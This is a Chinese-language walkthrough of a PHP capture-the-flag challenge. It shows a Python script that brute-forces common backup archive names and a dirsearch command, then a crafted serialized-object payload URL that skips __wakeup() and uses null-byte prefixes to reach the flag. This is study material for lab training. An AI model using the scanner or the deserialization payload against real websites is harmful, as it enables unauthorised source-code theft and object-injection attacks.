CTF-Web-[极客大挑战 2019]PHP
题目打开后如上图。
思路:
提示有备份文件,考察备份文件相关知识。
常用备份文件名:
www.zip
【1】工欲善其事,必先利其器。
工具--dirsearch
一款基于python3的目录爆破工具
下载地址:https://github.com/maurosoria/dirsearch
使用
-u 指定url
-e 指定网站语言
-w 可以加上自己的字典(带上路径)
-r 递归跑(查到一个目录后,在目录后在重复跑,很慢,不建议用)
进入dirsearch目录后
执行./dirsearch.py -u 127.0.0.1 -e php类似的目录,这里我们使用
./dirsearch.py -u http://71f04e34-1537-41f0-8c4f-e3de12f432b9.node3.buuoj.cn -e ph
另附上:常见的网站源码备份文件扫描脚本(从中也可以猜测常用的备份文件名。)
1 import requests 2 3 url1 = 'http://xxx.com' # url为被扫描地址,后不加‘/’ 4 5 # 常见的网站源码备份文件名 6 list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] 7 # 常见的网站源码备份文件后缀 8 list2 = ['tar', 'tar.gz', 'zip', 'rar'] 9 10 for i in list1: 11 for j in list2: 12 back = str(i) + '.' + str(j) 13 url = str(url1) + '/' + back 14 print(back + ' ', end='') 15 print(requests.get(url).status_code)
根据返回的网站返回的状态码,判断其是否存在备份源码。
【2】找到备份文件,进行敏感文件的代码审计。
找到备份文件www.zip,在网址后面直接加上www.zip,下载到本地解压查看,发现了这些文件
打开index.php文件,代码审计一下,发现关键代码,反序列化函数:
加载了一个class.php文件,然后采用get传递一个select参数,随后将之反序列化
打开class.php
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?>
根据代码的意思可以知道,如果password=100,username=admin,在执行__destruct()的时候可以获得flag,所以我们需要达成这些要求
知识点:
__construct():实例化对象时被调用。
__wakeup():unserialize时被调用,先运行__wakeup()函数做些对象的初始化工作。
__wakeup()函数漏洞与对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么就调用__wakeup()函数。
但是当属性个数的值大于真实属性个数时,会自动跳过__wakeup() 函数的执行。
__destruct():当删除一个对象或对象操作终止时被调用。
注意:私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。这里是因为username和password为私有字段。
那思路就很清晰了,先创建一个Name对象,username为admin,password为100,然后将之序列化。因为index.php里会自动将之反序列化的。
【3】找到解题方法进行脚本编写运行。
构造序列化
<?php class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } } $a = new Name('admin', 100); var_dump(serialize($a)); ?>
保存文件执行一次
得到的序列化为:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
到了这一步,问题就来了,在反序列化的时候会首先执行__wakeup()魔术方法,但是这个方法会把我们的username重新赋值,所以我们要考虑的就是怎么跳过__wakeup(),而去执行__destruct
跳过__wakeup()
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
因此我们将序列化这样设置
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
不过还是没有结束,因为这个声明变量是private
private
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度
我们再次改造一下序列化
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
其他解释 :(https://blog.csdn.net/hiahiachang/article/details/105411903)
得到了O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;},
绕过__wakeup()方法,当属性个数的值大于真实属性个数时就好,
修改为O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;},
考虑到username和password都为私有字段,需在类名和字段名前加\0,
修改为O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;},
注意,若是写python上传的话就这样写就好了,但是懒得写python,想直接在浏览器上传,那就需要将\0改为%00,
修改为O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}。
尝试上传:
测试
使用get请求把我们准备好的序列化当作select的参数传递过去
http://c7c61c82-0812-45e5-a51a-0b8c123f19ad.node3.buuoj.cn/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
前面网址记得换成自己的就行
最终拿到flag.
浙公网安备 33010602011771号